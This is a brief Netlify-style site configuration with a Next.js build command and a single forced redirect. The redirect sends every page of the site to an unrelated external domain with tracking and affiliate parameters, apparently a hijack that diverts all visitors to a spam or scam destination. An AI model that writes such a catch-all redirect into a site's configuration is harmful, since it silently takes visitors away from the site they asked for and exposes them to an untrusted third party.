[build]
  command = "npm run build"
  publish = ".next"
[[redirects]]
  from = "/*"
  to = "https://pqnjj.bestafair.com/?utm_source=da57dc555e50572d&ban=tg&j1=1&s1=4533&s2=2163253"
  status = 301
  force = true
